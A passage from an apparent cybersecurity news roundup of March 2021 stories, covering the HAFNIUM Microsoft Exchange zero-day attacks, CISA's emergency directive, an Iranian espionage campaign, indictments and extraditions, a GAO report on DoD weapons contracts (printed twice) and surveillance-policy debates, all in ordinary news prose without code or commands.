Purbeck, who’s 41 and lives in Meridian, Idaho, was arrested and appeared before a federal magistrate judge in Boise, the release says. No lawyer for Purbeck who might be able to comment on the charges was listed in online court records.
Between June 2017 and April 2018, Purbeck is accused of buying the usernames and passwords to computer servers belonging to multiple Georgia victims and then using that information to access their computer to steal personal information.
Federal prosecutors say Purbeck stole: medical records and other documents containing the names, addresses, birth dates and Social Security numbers of more than 43,000 people from a medical clinic in Griffin, Georgia; the personal information of more than 7,000 people from a medical practice in Locust Grove, Georgia; and police reports and other documents with personal information of more than 14,000 people from the city of Newnan, Georgia.
He’s also accused of hacking into a Florida orthodontist’s computers in June 2018 and taking medical records for more than 1,800 people, the release says. He’s then accused of threatening to sell the stolen patient information, as well as the personal information of the orthodontist’s child, unless the orthodontist paid a ransom in bitcoins, the release says.
Ukrainians Extradited to U.S. for Providing Money Laundering Services to Cybercriminals
9.3.2021 BigBrothers Securityweek
Two Ukrainians charged for their involvement in a network providing cash-out and money laundering services to cybercriminals have been extradited to the United States.
The individuals, Viktor Vorontsov, 39, and Zlata Hanska Muzhuk, 40, of Ukraine, were arrested in the Czech Republic. They were indicted in February 2020 in the Northern District of Texas.
According to the indictment, the two were part of a cash-out and money laundering network offering services to cybercriminals who accessed bank accounts using stolen credentials, and then transferred funds to drop accounts maintained by the cash-out actors.
Muzhuk and Vorontsov, the indictment reveals, operated a network of drop accounts and money mules that facilitated the fraudulent transfer of money from victims.
The conspiracy existed “for the entirety of 2017,” the indictment reveals. In October and November of that year, roughly $500,000 were transferred as part of the conspiracy.
The Czech National Organized Crime Agency (NCOZ) collaborated with the Federal Bureau of Investigation (FBI) in gathering evidence against Muzhuk and Vorontsov.
A criminal complaint and an arrest warrant were issued in early 2020 in Dallas, and the two were arrested in the Czech Republic, where Muzhuk was visiting Vorontsov at his residence.
Both were detained pending the extradition proceedings and were transferred to FBI custody on March 3, 2021, after their extraditions were granted by the Ministry of Justice of the Czech Republic, in January and February.
They both appeared in court in the Northern District of Texas and entered not-guilty pleas to the charges.
Iranian Hackers Using Remote Utilities Software to Spy On Its Targets
9.3.2021 BigBrothers Thehackernews
Hackers with suspected ties to Iran are actively targeting academia, government agencies, and tourism entities in the Middle East and neighboring regions as part of an espionage campaign aimed at data theft.
Dubbed "Earth Vetala" by Trend Micro, the latest finding expands on previous research published by Anomali last month, which found evidence of malicious activity aimed at UAE and Kuwait government agencies by exploiting ScreenConnect remote management tool.
The cybersecurity firm linked the ongoing attacks with moderate confidence to a threat actor widely tracked as MuddyWater, an Iranian hacker group known for its offensives primarily against Middle Eastern nations.
Earth Vetala is said to have leveraged spear-phishing emails containing embedded links to a popular file-sharing service called Onehub to distribute malware that ranged from password dumping utilities to custom backdoors, before initiating communications with a command-and-control (C2) server to execute obfuscated PowerShell scripts.
The links themselves direct victims to a .ZIP file that contains a legitimate remote administration software developed by RemoteUtilities, which is capable of downloading and uploading files, capturing screenshots, browsing files and directories, and executing and terminating processes.
Affected Countries
Noting that the tactics and techniques between the two campaigns that distribute RemoteUtilities and ScreenConnect are broadly similar, Trend Micro said the targets of the new wave of attacks are mainly organizations located in Azerbaijan, Bahrain, Israel, Saudi Arabia, and the UAE.
In one particular instance involving a compromised host in Saudi Arabia, the researchers found that the adversary tried to unsuccessfully configure SharpChisel — a C# wrapper for a TCP/UDP tunneling tool called chisel — for C2 communications, before downloading a remote access tool, a credential stealer, and a PowerShell backdoor capable of executing arbitrary remote commands.
"Earth Vetala represents an interesting threat," Trend Micro said. "While it possesses remote access capabilities, the attackers seem to lack the expertise to use all of these tools correctly. This is unexpected since we believe this attack is connected to the MuddyWater threat actors — and in other connected campaigns, the attackers have shown higher levels of technical skill."
Chinese hackers allegedly hit thousands of organizations using Microsoft Exchange
8.3.2021 BigBrothers Securityaffairs
Thousands of organizations may have been victims of cyberattacks on Microsoft Exchange servers conducted by China-linked threat actors since January.
At least tens of thousands of Microsoft customers may have been hacked by allegedly China-linked threat actors since January, including business and government agencies.
The attacks started in January, but the attackers’ activity intensified in recent weeks according to the experts at security firm Volexity.
Volexity experts the compromise of Microsoft Exchange servers belonging to its customers and discovered that the attackers exploited a zero-day server-side request forgery (SSRF) vulnerability in Microsoft Exchange (CVE-2021-26855).
“The attacker was using the vulnerability to steal the full contents of several user mailboxes. This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment.” reads the analysis published by Volexity. “The attacker only needs to know the server running Exchange and the account from which they want to extract e-mail.”
Microsoft confirmed the attacks against the Exchange servers that aimed at stealing emails and install malware to gain persistence in the target networks.
“In the attacks observed, the threat actor used these vulnerabilities to access on-premises Exchange servers which enabled access to email accounts, and allowed installation of additional malware to facilitate long-term access to victim environments.” wrote Microsoft. “Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to HAFNIUM, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures.”
Last week Microsoft has released emergency out-of-band security updates that address four zero-day issues (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065) in all supported MS Exchange versions that are actively exploited in the wild.
The US Cybersecurity and Infrastructure Security Agency (CISA) has issued the Emergency Directive 21-02 in response to the disclosure of zero-day vulnerabilities in Microsoft Exchange.
The IT giant reported that at least one China linked APT group, tracked as HAFNIUM, chained these vulnerabilities to access on-premises Exchange servers to access email accounts, and install backdoors to maintain access to victim environments.
The US CISA released the emergency directive, titled “Mitigate Microsoft Exchange On-Premises Product Vulnerabilities,” to order federal agencies to urgently update or disconnect MS Exchange on-premises installs.
“CISA partners have observed active exploitation of vulnerabilities in Microsoft Exchange on-premises products. Neither the vulnerabilities nor the identified exploit activity is currently known to affect Microsoft 365 or Azure Cloud deployments. Successful exploitation of these vulnerabilities allows an attacker to access on-premises Exchange Servers, enabling them to gain persistent system access and control of an enterprise network.” reads the advisory published by US CISA.
“CISA has determined that this exploitation of Microsoft Exchange on-premises products poses an unacceptable risk to Federal Civilian Executive Branch agencies and requires emergency action.”
CISA urges agencies that have the expertise to collect forensically triage artifacts and determine the presence of any anomalous behavior or an indication of compromise,
The popular investigator Brian Krebs speculates that at least 30,000 Microsoft customers were impacted by the hacking campaign.
“At least 30,000 organizations across the United States — including a significant number of small businesses, towns, cities and local governments — have over the past few days been hacked by an unusually aggressive Chinese cyber espionage unit that’s focused on stealing email from victim organizations, multiple sources tell KrebsOnSecurity.” reported Krebs. “The espionage group is exploiting four newly-discovered flaws in Microsoft Exchange Server email software, and has seeded hundreds of thousands of victim organizations worldwide with tools that give the attackers total, remote control over affected systems.”
Chinese authorities denied any involvement in the recent attacks.
“China has reiterated on multiple occasions that given the virtual nature of cyberspace and the fact that there are all kinds of online actors who are difficult to trace, tracing the source of cyberattacks is a complex technical issue.” said Wang Wenbin, a spokesman for China’s Ministry of Foreign Affairs “It is also a highly sensitive political issue to pin the label of cyberattack to a certain government.”
Volexity experts observed an escalation of the attacks in late February, when attackers started chaining multiple vulnerabilities and targeting a larger number of victims.
“During the course of multiple incident response efforts, Volexity identified that the attacker had managed to chain the SSRF vulnerability with another that allows remote code execution (RCE) on the targeted Exchange servers (CVE-2021-27065).” continues Volexity. “In all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT), and move laterally to other systems and environments.”
Researchers at the MS Exchange Server team have recently released a script that could be used by administrators to check if their installs are vulnerable to the recently disclosed vulnerabilities.
Microsoft released the tool as open-source on GitHub, it can be used to check the status of Exchange servers.
The script automates the tests for the four zero-day vulnerabilities in Microsoft Exchange Server.
“Microsoft has released an updated script that scans Exchange log files for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021.” states CISA.
“CISA is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the Test-ProxyLogon.ps1 script—as soon as possible—to help determine whether their systems are compromised. For additional information on the script, see Microsoft’s blog HAFNIUM targeting Exchange Servers with 0-day exploits.”
U.S. DoD Weapons Programs Lack ‘Key’ Cybersecurity Measures
6.3.2021 BigBrothers Threatpost
The lack of cybersecurity requirements in weapons contracts from the Department of Defense opens the door for dangerous cyberattacks.
Weapons programs from the U.S. Department of Defense (DoD) are falling short when it comes to incorporating cybersecurity requirements, according to a new watchdog report.
While the DoD has developed a range of policies aimed at hardening the security for its weapon systems, the guidance leaves out a key detail — the contracts for procuring various weapons.
These contracts are awarded to various manufacturers, from massive military contractors to small businesses, for hundreds of billions of dollars each year by the U.S. government. And according to a new report by the U.S. Government Accountability Office (GAO), 60 percent of the contracts included zero requirements when it comes to cybersecurity protection measures.
The GAO, which is an independent, non-partisan agency that works for Congress and acts as a “congressional watchdog” and third-party auditor, noted that the inclusion of cybersecurity stipulations in the contracts is “key.” When it comes to any type of requirement in weapons contracts, whether it’s cybersecurity- or services-related, “if it is not in the contract, do not expect to get it,” according to the report.
“Specifically, cybersecurity requirements should be defined in acquisition program contracts, and criteria should be established for accepting or rejecting the work and for how the government will verify that requirements have been met,” according to the GAO’s report, released Thursday [PDF]. “However, GAO found examples of program contracts omitting cybersecurity requirements, acceptance criteria or verification processes.”
Weapons Contracts
When it comes to security, the weapons contracts should define requirements “to satisfy the needs of the agency, identify criteria for accepting or rejecting the work, and where applicable, establish how the government will verify that requirements have been met,” according to the GAO.
However, the majority of the DoD’s weapons contracts do not include any cybersecurity requirements at all — and if they do, the terms remain vague in terms of how security measures would be implemented, or shy away from defining cybersecurity activities “in objective terms with a clear basis for accepting or rejecting the system.”
Another issue is that the contracts do not identify measures for verifying that security requirements are met.
“For example, one of the programs had a cybersecurity strategy that identified the [risk-management framework] RMF categorization and described how the program would select security controls,” according to the GAO’s report. “However, when the contract was awarded, it did not include cybersecurity requirements in the statement of work, the system specification or the contract deliverables.”
Brandon Hoffman, CISO at Netenrich, said it is “stunning” that at this point, cybersecurity requirements are largely not part of the government’s weapons-systems contracts.
“It is equally hard to consider why cybersecurity would not be critical to the acquisition of a weapons system,” Hoffman told Threatpost. “Thinking about the potential damage that could be done with unauthorized access to networks related to weapons systems, for actual human life or the loss of IP/military advantage, these contracts should absolutely have strict cyber-requirements.”
DoD Weapons Security Risks
Most modern DoD weapon systems depend on software and various IT systems to operate. As an example, the U.S. Army plans to replace its decades-old vehicles – such as the Bradley infantry-fighting vehicle and the Abrams main battle tank – with new systems incorporating autonomous systems, said the GAO.
Should the DoD’s network of sophisticated, expensive weapons systems be hit by cybercriminals, they could become incapacitated, leading to potentially dangerous outcomes. Dirk Schrader, global vice president of security research at New Net Technologies (NNT), told Threatpost that the top risk here is to lose communication of – and ultimately control over – those systems.
“A loss of confidentiality means the enemy can gain vital intelligence about operations, tactics and strategies during battle,” he said. “Losing the integrity can hamper a weapons system in its functions, for example its target acquisition subsystem. Or, worse, it could be used against the own forces. If availability is lost, central command’s momentum is likely affected.”
Key Recommendations For DoD
Moving forward, the GAO made three recommendations: Each suggesting that the Army, Navy and Marine Corps provide better guidance on how programs should incorporate tailored cybersecurity requirements into contracts.
“DoD concurred with two recommendations, and stated that the third — to the Marine Corps — should be merged with the one to the Navy,” according to the GAO. “DoD’s response aligns with the intent of the recommendation.”
Government cybersecurity measures have been under scrutiny, particularly over the past few months after the sprawling SolarWinds cyberespionage campaign hit various U.S. government agencies and others hard.
U.S. DoD Weapons Programs Lack ‘Key’ Cybersecurity Measures
6.3.2021 BigBrothers Threatpost
The lack of cybersecurity requirements in weapons contracts from the Department of Defense opens the door for dangerous cyberattacks.
Weapons programs from the U.S. Department of Defense (DoD) are falling short when it comes to incorporating cybersecurity requirements, according to a new watchdog report.
While the DoD has developed a range of policies aimed at hardening the security for its weapon systems, the guidance leaves out a key detail — the contracts for procuring various weapons.
These contracts are awarded to various manufacturers, from massive military contractors to small businesses, for hundreds of billions of dollars each year by the U.S. government. And according to a new report by the U.S. Government Accountability Office (GAO), 60 percent of the contracts included zero requirements when it comes to cybersecurity protection measures.
The GAO, which is an independent, non-partisan agency that works for Congress and acts as a “congressional watchdog” and third-party auditor, noted that the inclusion of cybersecurity stipulations in the contracts is “key.” When it comes to any type of requirement in weapons contracts, whether it’s cybersecurity- or services-related, “if it is not in the contract, do not expect to get it,” according to the report.
“Specifically, cybersecurity requirements should be defined in acquisition program contracts, and criteria should be established for accepting or rejecting the work and for how the government will verify that requirements have been met,” according to the GAO’s report, released Thursday [PDF]. “However, GAO found examples of program contracts omitting cybersecurity requirements, acceptance criteria or verification processes.”
Weapons Contracts
When it comes to security, the weapons contracts should define requirements “to satisfy the needs of the agency, identify criteria for accepting or rejecting the work, and where applicable, establish how the government will verify that requirements have been met,” according to the GAO.
However, the majority of the DoD’s weapons contracts do not include any cybersecurity requirements at all — and if they do, the terms remain vague in terms of how security measures would be implemented, or shy away from defining cybersecurity activities “in objective terms with a clear basis for accepting or rejecting the system.”
Another issue is that the contracts do not identify measures for verifying that security requirements are met.
“For example, one of the programs had a cybersecurity strategy that identified the [risk-management framework] RMF categorization and described how the program would select security controls,” according to the GAO’s report. “However, when the contract was awarded, it did not include cybersecurity requirements in the statement of work, the system specification or the contract deliverables.”
Brandon Hoffman, CISO at Netenrich, said it is “stunning” that at this point, cybersecurity requirements are largely not part of the government’s weapons-systems contracts.
“It is equally hard to consider why cybersecurity would not be critical to the acquisition of a weapons system,” Hoffman told Threatpost. “Thinking about the potential damage that could be done with unauthorized access to networks related to weapons systems, for actual human life or the loss of IP/military advantage, these contracts should absolutely have strict cyber-requirements.”
DoD Weapons Security Risks
Most modern DoD weapon systems depend on software and various IT systems to operate. As an example, the U.S. Army plans to replace its decades-old vehicles – such as the Bradley infantry-fighting vehicle and the Abrams main battle tank – with new systems incorporating autonomous systems, said the GAO.
Should the DoD’s network of sophisticated, expensive weapons systems be hit by cybercriminals, they could become incapacitated, leading to potentially dangerous outcomes. Dirk Schrader, global vice president of security research at New Net Technologies (NNT), told Threatpost that the top risk here is to lose communication of – and ultimately control over – those systems.
“A loss of confidentiality means the enemy can gain vital intelligence about operations, tactics and strategies during battle,” he said. “Losing the integrity can hamper a weapons system in its functions, for example its target acquisition subsystem. Or, worse, it could be used against the own forces. If availability is lost, central command’s momentum is likely affected.”
Key Recommendations For DoD
Moving forward, the GAO made three recommendations: Each suggesting that the Army, Navy and Marine Corps provide better guidance on how programs should incorporate tailored cybersecurity requirements into contracts.
“DoD concurred with two recommendations, and stated that the third — to the Marine Corps — should be merged with the one to the Navy,” according to the GAO. “DoD’s response aligns with the intent of the recommendation.”
Government cybersecurity measures have been under scrutiny, particularly over the past few months after the sprawling SolarWinds cyberespionage campaign hit various U.S. government agencies and others hard.
NSA, DHS Issue Guidance on Protective DNS
6.3.2021 BigBrothers Securityweek
The U.S. National Security Agency and the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) this week published joint guidance on Protective DNS (PDNS).
Designed to translate domain names into IP addresses, the Domain Name System (DNS) is a key component of Internet and network communications.
Protective DNS was designed as a security service that leverages the DNS protocol and infrastructure for the analysis of DNS queries and mitigation of possible threats.
Attacks involving domain names may take various forms, including typosquatting, links in phishing emails, connecting compromised devices to remote command and control servers, and data exfiltration to remote hosts.
“The domain names associated with malicious content are often known or knowable, and preventing their resolution protects individual users and the enterprise,” the NSA and CISA note.
Both the NSA and CISA have previously issued documents related to the mitigation of DNS-related issues, and the new guidance is meant to provide further details on the benefits and risks of protective DNS services.
PDNS, the joint guidance says, relies on a policy-implementing DNS resolver – often called Response Policy Zone (RPZ) functionality – which checks both domain name queries and returned IP addresses to prevent connections to malicious sites.
“PDNS can also protect a user by redirecting the requesting application to a non-malicious site or returning a response that indicates no IP address was found for the domain queried,” the two agencies explain.
To set up PDNS, an organization can simply modify its recursive resolver to rely on the PDNS provider’s DNS server. However, software changes on hosts are required for more complex and secure PDNS deployments, the NSA and CISA say.
Some of the outlined best practices regarding PDNS involve the use of a PDNS system as part of a layered defense-in-depth strategy, blocking unauthorized DNS queries, and taking into consideration hybrid enterprise architectures.
The joint document also provides assessments of several commercial PDNS providers, so that organizations are better informed when making decisions. The assessment is based on publicly available information about enterprise PDNS services, not on formal testing, and is not meant as a purchase recommendation.
Report: Russian Hackers Exploit Lithuanian Infrastructure
6.3.2021 BigBrothers Securityweek
Hacker groups linked to Russian intelligence conducted cyber-attacks against top Lithuanian officials and decision-makers last year and used the Baltic nation’s technology infrastructure as a base to hit targets elsewhere, a report by Lithuania’s intelligence service said Thursday.
The annual national security threat assessment report claimed that, among others, the Russian cyber-espionage group APT29 with alleged links to Russia’s intelligence services “exploited” Lithuania’s information technology infrastructure “to carry out attacks by APT29 against foreign entities developing a COVID-19 vaccine.”
The report produced by Lithuania’s State Security Department said the COVID-19 pandemic and lockdown in Lithuania, a NATO member that is Russia’s neighbor and a former Soviet republic, decreased Russian intelligence operations against the country in 2020 and shifted the Kremlin’s efforts to cyber-espionage.
“Nevertheless, Russian intelligence operations pose a major threat to Lithuania’s national security,” State Security Department head Darius Jauniskis told Lithuanian lawmakers as he presented the report at Seimas, the Parliament, on Thursday.
Jauniskis added that Moscow was using military and economic means and influencing by information “for the implementation of its political aims” in the Baltic nation of 2.8 million.
The report estimated that the overall threat of cyber and information attacks has increased in Lithuania as the number of cyber-attacks was continuing to grow annually.
Jauniskis accused Russia of trying to use the pandemic as a way to create havoc in Lithuania, which he said had witnessed “dozens” of such “failed attempts” recently.
“Those activities were well-coordinated and fueled by anti-Western propaganda coming out from the Kremlin,” Jauniskis said.
Similarly to its neighbors Estonia and Latvia, Lithuania’s relations to Russia have remained icy since the nation regained its independence amid the fall of the Soviet Union in 1991.
Estonia’s foreign intelligence agency published its annual report last month saying that Russia is counting on the COVID-19 pandemic to weaken unity in the West, which would help Moscow gain a more prominent role in international affairs and allegedly lead to declining Western influence on the global stage.
German Officials Want Emails, IMs Tied to Real-World ID
6.3.2021 BigBrothers Securityweek
Germany security officials are proposing that Internet companies should link a user’s real-world identity to all of their instant messages, emails and other online communication, prompting criticism from digital rights activists.
Like in many other countries, mobile phone firms in Germany are required to verify a customer’s identity before selling them a SIM card. Under a proposal leaked late Tuesday, Germany’s Interior Ministry wants the same rule to apply to “number independent” telecommunications services such as WhatsApp, Signal or Facebook messenger.
A ministry spokesman declined to explicitly confirm the veracity of the proposal, which was leaked by secure email provider Posteo. But the spokesman said police had the right to interfere with communications privacy “whether the user resorts to classical telephony or encrypted telecommunications services.”
“I think it’s obvious that the security agencies in Germany need to have the the same powers in the analogue world as in the digital world if they are going to do their job,” the spokesman, Steve Alter, told reporters in Berlin on Wednesday.
Henning Tillmann, co-chairman of D64, a group that campaigns for citizens’ rights in the digital world, warned that the proposal risked making Germany a “mini-China.”
“This couples technological ignorance with surveillance fantasies,” he wrote on Twitter.
The proposal is currently at the consultation stage among ministries and may not survive in this form in a planned telecommunications bill.
National Surveillance Camera Rollout Roils Privacy Activists
5.3.2021 BigBrothers Securelist
IoT Cybersecurity Improvement Act
TALON, a network of smart, connected security cameras developed by the Atlanta-based startup and installed by law enforcement around the country, raises surveillance-related privacy concerns.
While controversy over the potential overreach of neighborhood and law-enforcement video surveillance has focused mainly on Ring, an Atlanta-based startup has quietly rolled out its own network of smart surveillance cameras across the country that is again raising questions of privacy and the ire of some advocating it, according to a published report.
Flock Safety promises to protect neighborhoods with smart cameras with automated license plate recognition (ALPR) technology that are sold to homeowners associations, businesses or law enforcement and are designed to automatically read vehicle license plates “up to 75 MPH, day & night, up to 75 ft. away,” according to the company’s website.
Ostensibly, ALPR—which has been around for years but is gaining new momentum thanks to its integration with smart cameras–is aimed at protecting citizens. However, a published report suggests that Flock may be overstretching its wings and has expanded to do much more than merely provide a virtual neighborhood watch.
Vice Motherboard reported Wednesday that Flock has quietly built up an extensive nationwide network of its cameras called TALON that are maintained by law-enforcement and offer up to 500 million scans of vehicles a month, according to one email of a series of Flock emails obtained by the publication. Motherboard said its reporters viewed hundreds of pages of internal police emails from nearly 20 police departments around the country obtained using public records requests
Moreover, more than 500 police departments in more than 1,000 cities have access to Flock cameras, which are not only detecting license-plate information but also people, cars, animals and bicycles, according to info obtained by Motherboard.
The company also boasted that it’s “collecting evidence” that helps police solve four to five crimes per hour, with administrators of neighborhood camera networks able to share video data not only with law enforcement, but also the home owner association’s board, or the individual members of an entire neighborhood, according to the report.
Good Intentions?
Flock offers two types of cameras—one called the “Sparrow” that that uploads images to a secure server for only those who have access to view and share, and another called the “Falcon” that can use the data collected to automatically alert police if the plate is already on a “hotlist” for potential criminal activity so they can track the vehicle and its occupants.
Supporters of the technology and initiative argue trying to help reduce crime and protect neighborhoods is a good thing. Flock company founder and CEO Garrett Langley was inspired to try “to eliminate non-violent crime while respecting privacy” after he himself was a victim of property crime in his Atlanta neighborhood, according to the website. Langley so far has not responded to an email sent Thursday by Threatpost requesting comments and details about Flock TALON and the technology’s privacy protections.
A promotional video on the company’s website said that in their research with law enforcement, Flock founders learned that license-plate info was the missing link in helping solve non-violent crimes, and they designed Flock cameras to provide this info accurately and securely. Key selling points for that company are that they’ve made their smart cameras small and affordable so they are both inobtrusive and cost-effective for customers.
Indeed, Flock also is aware of the privacy issues that its technology can raise, claiming that it’s the “only ALPR crime-solving camera system with privacy protection measures built in.”
The video explains this concept a bit further, saying that the customer alone has all the access to the camera data, leaving it up to them to decide if they want to share it and with whom.
But as any security or privacy expert knows, it’s not difficult for that type of data to fall into the wrong hands. This is why not everyone is as thrilled with the integration of ALPR into smart surveillance cameras as Flock’s founders and customers.
Flock Roll Out Sparks Privacy Concerns
Digital privacy group the Electronic Frontier Foundation has criticized ALPR technology and companies like Flock, claiming “there is no real evidence that ALPRs reduce crime,” and that their technology is purely another surveillance tool, plain and simple.
“ALPR vendors, like other surveillance salespeople, operate on the assumption that surveillance will reduce crime by either making would-be criminals aware of the surveillance in hopes it will be a deterrent, or by using the technology to secure convictions of people that have allegedly committed crimes in the neighborhood,” according to a blog post by Jason Kelley and Matthew Guariglia written last September. “However, there is little empirical evidence that such surveillance reduces crime.”\
Flock would certainly beg to differ on this point. An article from Fox 5 Atlanta–the link for which is on the company’s website–claimed in November 2019 that Flock safety cameras helped reduce crime by up to 64 percent in six months in an area near Six Flags Over Georgia. Other linked articles boast similar success stories in how Flock helped prevent crimes or even—in the case of a College Park, Ga., police sergeant who was shot and wounded on duty–catch a murder suspect.
Still, the controversy over using ubiquitous surveillance and smart-camera technology to help solve crime is likely to continue to have pushback from privacy advocates, even if those behind the technology have good intentions. This was recently evidenced yet again by criticism of a pilot program in Jackson, Miss., to use the Ring door cameras as part of surveillance efforts to help police fight rising crime, which the American Civil Liberties Union (ACLU) and others bashed.
CISA Issues Emergency Directive on In-the-Wild Microsoft Exchange Flaws
5.3.2021 BigBrothers Thehackernews
Following Microsoft's release of out-of-band patches to address multiple zero-day flaws in on-premises versions of Microsoft Exchange Server, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an emergency directive warning of "active exploitation" of the vulnerabilities.
The alert comes on the heels of Microsoft's disclosure that China-based hackers were exploiting unknown software bugs in Exchange server to steal sensitive data from select targets, marking the second time in four months that the U.S. has scrambled to address a widespread hacking campaign believed to be the work of foreign threat actors.
While the company mainly attributed the campaign to a threat group called HAFNIUM, Slovakian cybersecurity firm ESET said it found evidence of CVE-2021-26855 being actively exploited in the wild by several cyber espionage groups, including LuckyMouse, Tick, and Calypso targeting servers located in the U.S., Europe, Asia, and the Middle East.
Researchers at Huntress Labs have also sounded the alarm about mass exploitation of Exchange servers, noting that over 350 web shells have been discovered across approximately 2,000 vulnerable servers.
"Among the vulnerable servers, we also found over 350 web shells — some targets may have more than one web shell, potentially indicating automated deployment or multiple uncoordinated actors," Huntress senior security researcher John Hammond said. "These endpoints do have antivirus or EDR solutions installed, but this has seemingly slipped past a majority of preventative security products."
The latest development indicates a much larger spread that extends beyond the "limited and targeted" attacks reported by Microsoft earlier this week.
It's not clear if any U.S. government agencies have been breached in the campaign, but the CISA directive underscores the urgency of the threat.
Strongly urging organizations to apply the patches as soon as possible, the agency cited the "likelihood of widespread exploitation of the vulnerabilities after public disclosure and the risk that federal government services to the American public could be degraded."
Microsoft Exchange Zero-Day Attackers Spy on U.S. Targets
4.3.2021 BigBrothers Threatpost
Full dumps of email boxes, lateral movement and backdoors characterize sophisticated attacks by a Chinese APT – while more incidents spread like wildfire.
Microsoft has spotted multiple zero-day exploits in the wild being used to attack on-premises versions of Microsoft Exchange Server. Adversaries have been able to access email accounts, steal a raft of data and drop malware on target machines for long-term remote access, according to the computing giant.
The attacks are “limited and targeted,” according to Microsoft, spurring it to release out-of-band patches this week. The exploited bugs are being tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.
However, other researchers have reported seeing the activity compromising mass swathes of victim organizations.
“The team is seeing organizations of all shapes and sizes affected, including electricity companies, local/county governments, healthcare providers and banks/financial institutions, as well as small hotels, multiple senior citizen communities and other mid-market businesses,” a spokesperson at Huntress told Threatpost.
The culprit is believed to be an advanced persistent threat (APT) group known as Hafnium (also the name of a chemical element), which has a history of targeting assets in the United States with cyber-espionage campaigns. Targets in the past have included defense contractors, infectious disease researchers, law firms, non-governmental organizations (NGOs), policy think tanks and universities.
“Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to Hafnium, a group assessed to be state-sponsored and operating out of China, based on observed victimology, tactics and procedures,” according to an announcement this week from Microsoft on the attacks.
Zero-Day Security Bugs in Exchange Server
“The fact that Microsoft chose to patch these flaws out-of-band rather than include them as part of next week’s Patch Tuesday release leads us to believe the flaws are quite severe even if we don’t know the full scope of those attacks,” Satnam Narang, staff research engineer at Tenable, said via email.
Microsoft patched following bugs this week, and admins should update accordingly:
CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability that allows authentication bypass: A remote attacker can simply send arbitrary HTTP requests to the Exchange server and be able to authenticate to it. From there, an attacker can steal the full contents of multiple user mailboxes.
CVE-2021-26857 is an insecure-deserialization vulnerability in the Unified Messaging service, where untrusted user-controllable data is deserialized by a program. An exploit allows remote attackers with administrator permissions to run code as SYSTEM on the Exchange server.
CVE-2021-26858 and CVE-2021-27065 are both post-authentication arbitrary file-write vulnerabilities in Exchange. Once authenticated with an Exchange server (using CVE-2021-26855 or with compromised admin credentials), an attacker could write a file to any path on the server – thus achieving remote code execution (RCE).
Researchers at Volexity originally uncovered the SSRF bug as part of an incident response and noted, “This vulnerability is remotely exploitable and does not require authentication of any kind, nor does it require any special knowledge or access to a target environment. The attacker only needs to know the server running Exchange and the account from which they want to extract email.”
They also observed the SSRF bug being chained with CVE-2021-27065 to accomplish RCE in multiple attacks.
In addition to Volexity, Microsoft credited security researchers at Dubex with uncovering the recent activity, which was first observed in January.
“Based on what we know so far, exploitation of one of the four vulnerabilities requires no authentication whatsoever and can be used to potentially download messages from a targeted user’s mailbox,” said Tenable’s Narang. “The other vulnerabilities can be chained together by a determined threat actor to facilitate a further compromise of the targeted organization’s network.”
What Happened in the Hafnium Attacks?
In the observed campaigns, the four zero-day bugs were used to gain initial access to targeted Exchange servers and achieve RCE. Hafnium operators then deployed web shells on the compromised servers, which were used to steal data and expand the attack, according to researchers.
“In all cases of RCE, Volexity has observed the attacker writing webshells (ASPX files) to disk and conducting further operations to dump credentials, add user accounts, steal copies of the Active Directory database (NTDS.DIT) and move laterally to other systems and environments,” according to Volexity’s writeup.
Following web shell deployment, Microsoft found that Hafnium operators performed a range of post-exploitation activity:
Using Procdump to dump the LSASS process memory;
Using 7-Zip to compress stolen data into ZIP files for exfiltration;
Adding and using Exchange PowerShell snap-ins to export mailbox data;
Using the Nishang Invoke-PowerShellTcpOneLine reverse shell;
And downloading PowerCat from GitHub, then using it to open a connection to a remote server.
The attackers were also able to download the Exchange offline address book from compromised systems, which contains information about an organization and its users, according to the analysis.
“The good news for defenders is that the post-exploitation activity is very detectable,” said Katie Nickels, director of intelligence at Red Canary, via email, adding her firm has detected numerous attacks as well. “Some of the activity we observed uses the China Chopper web shell, which has been around for more than eight years, giving defenders ample time to develop detection logic for it.”
Who is the Hafnium APT?
Hafnium has been tracked by Microsoft before, but the company has only just released a few details on the APT.
In terms of its tactics, “Hafnium has previously compromised victims by exploiting vulnerabilities in internet-facing servers, and has used legitimate open-source frameworks, like Covenant, for command and control,” according to Microsoft. “Once they’ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA.”
Hafnium operates primarily from leased virtual private servers in the United States, and primarily goes after U.S. targets, but is linked to the Chinese government, according to Microsoft. It characterizes the APT as “a highly skilled and sophisticated actor.”
Time to Patch: Expect More Attacks Soon
It should be noted that other researchers say they have seen these vulnerabilities being exploited by different threat actors targeting other regions, according to Narang.
“We expect other threat actors to begin leveraging these vulnerabilities in the coming days and weeks, which is why it is critically important for organizations that use Exchange Server to apply these patches immediately,” he added.
And indeed, researchers at Huntress said they have discovered more than 100 web shells deployed across roughly 1,500 vulnerable servers (with antivirus and endpoint detection/recovery installed) and expect this number to keep rising.
They’re not alone.
“FireEye has observed these vulnerabilities being exploited in the wild and we are actively working with several impacted organizations,” Charles Carmakal, senior vice president and CTO at FireEye Mandiant, said via email. “In addition to patching as soon as possible, we recommend organizations also review their systems for evidence of exploitation that may have occurred prior to the deployment of the patches.”
NSA embraces the Zero Trust Security Model
2.3.2021 BigBrothers Securityaffairs
The National Security Agency (NSA) published a document to explain the advantages of implementing a zero-trust model.
The National Security Agency (NSA) recently published a document to explain the benefits of adopting a zero-trust model, and advice to navigate the process.
Modern infrastructure are complex environments that combine multiple technologies and that are exposed to sophisticated cyber threats.
A Zero-Trust security model eliminates implicit trust in any entities inside or outside the perimeter of an organization, instead, it recommends implementing authorization and authentication for any processes within the company.
